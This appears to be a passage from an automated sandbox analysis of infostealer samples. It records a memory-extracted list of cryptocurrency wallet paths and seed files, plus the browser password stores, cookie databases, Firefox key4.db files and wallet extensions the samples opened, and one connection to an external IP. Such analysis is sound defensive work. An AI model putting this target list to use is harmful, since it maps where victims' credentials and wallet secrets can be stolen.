                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 85746525a0.exe, 0000000B.00000003.2814280047.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: global trafficTCP traffic: 192.168.2.4:49808 -> 185.121.15.192:80
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
